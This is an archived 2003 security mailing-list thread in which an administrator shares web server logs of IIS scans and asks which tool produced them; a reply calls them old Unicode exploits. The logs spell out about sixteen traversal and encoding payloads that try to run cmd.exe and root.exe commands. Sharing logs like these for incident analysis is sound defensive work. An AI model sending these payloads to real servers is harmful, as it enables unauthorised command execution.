I know what the exploits are :) I was curious if anyone had seen the same combination of scans and/or knew which tool generated them. I would assume it is a newish tool because I've not been able to find the pattern in my logs going back 6-8 months. On Tuesday, July 29, 2003, at 12:42 PM, James Williams wrote: > Looks like old Unicode exploits. Those scanners are all over the place. > You could probably go to packetstormsecurity.nl and search for > "Unicode" > and find one. > > James Williams > Network Systems Engineer > West Texas A&M University > http://www.wtamu.edu > Phone: 806-651-2162 > Email: jwilliamsat_private > > > -----Original Message----- > From: Danny [mailto:dannyat_private] > Sent: Monday, July 28, 2003 10:24 PM > To: incidentsat_private > Subject: Anyone know this tool? > > Does anyone happen to know what tool this is? I've seen the exact same > scans on 6 of our servers on completely different networks. All the > scans have been from different source IP's and all the servers were hit > > within a space of a few hours. > > Curiosity is getting the better of me since i've never seen this exact > pattern before :) > > 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET > /scripts/root.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:39 -0500] "GET > /MSADC/root.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET > /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET > /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET > /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:40 -0500] "GET > /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET > /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir > HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET > /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../ > winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:41 -0500] "GET > /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET > /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET > /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET > /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET > /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 - "-" > "-" > 64.180.241.204 - - [28/Jul/2003:22:18:42 -0500] "GET > /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - > "-" "-" > 64.180.241.204 - - [28/Jul/2003:22:18:43 -0500] "GET > /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" > "-" > > Danny > Work - http://www.eBoundary.com - Secure, FreeBSD hosting. > Play - http://www.eBoundary.net - Who really sets your electronic > boundaries? > AIM: eBoundaryTch | ICQ: 3090141 > > > ----------------------------------------------------------------------- > - > --- > ----------------------------------------------------------------------- > - > ---- > > > > Danny Work - http://www.eBoundary.com - Secure, FreeBSD hosting. Play - http://www.eBoundary.net - Who really sets your electronic boundaries? AIM: eBoundaryTch | ICQ: 3090141 --------------------------------------------------------------------------- ----------------------------------------------------------------------------
This archive was generated by hypermail 2b30 : Tue Jul 29 2003 - 13:43:14 PDT